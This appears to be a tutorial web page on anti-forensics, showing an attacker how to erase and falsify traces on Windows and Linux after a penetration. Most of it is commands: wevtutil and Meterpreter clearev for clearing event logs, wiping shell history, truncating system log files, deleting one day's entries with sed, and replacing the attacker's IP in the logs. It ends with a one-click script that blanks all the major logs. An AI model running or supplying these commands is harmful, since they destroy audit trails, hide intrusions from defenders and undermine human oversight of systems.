What is the way to clean traces on windows and linux?-Linux Operation and Maintenance-php.cn

1. Overview:

After the penetration is completed, in order to reduce the probability of discovery and traceability, the attacker must clear his or her attack traces.

2. Windows

Manually delete logs when you have remote desktop permissions:

开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

Copy after login

Wevtutil tool command line clearing:

wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl security 清理安全日志

Copy after login

Meterperter comes with a clear log function:

clearev 清除windows中的应用程序日志、系统日志、安全日志

Copy after login

Clear recent:

或直接打开C:\Users\Administrator\Recent并删除所有内容 或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

Copy after login

3. linux

Clear command history

histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 HISTZISE=0

Copy after login

Execute commands in a hidden location , use vim to open the file and execute the command:

:set history=0 :!command

Copy after login

Linux log file

/var/run/utmp 记录现在登入的用户 /var/log/wtmp 记录用户所有的登入和登出 /var/log/lastlog 记录每一个用户最后登入时间 /var/log/btmp 记录错误的登入尝试 /var/log/auth.log 需要身份确认的操作 /var/log/secure 记录安全相关的日志信息 /var/log/maillog 记录邮件相关的日志信息 /var/log/message 记录系统启动后的信息和错误日志 /var/log/cron 记录定时任务相关的日志信息 /var/log/spooler 记录UUCP和news设备相关的日志信息 /var/log/boot.log 记录守护进程启动和停止相关的日志消息

Copy after login

Completely delete the log file

cat /dev/null > filename : > filename > filename echo "" > filename echo > filename

Copy after login

Targeted deletion of the log file

删除当天日志 sed -i '/当天日期/'d filename

Copy after login

Tamper with the log File

将所有170.170.64.17ip替换为127.0.0.1 sed -i 's/170.170.64.17/127.0.0.1/g'

Copy after login

One-click clearing script:

#!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/user.log echo > /var/log/wtmp echo > /var/log/lastlog echo > /var/log/btmp echo > /var/run/utmp rm ~/./bash_history history -c

Copy after login

The above is the detailed content of What is the way to clean traces on windows and linux?. For more information, please follow other related articles on the PHP Chinese website!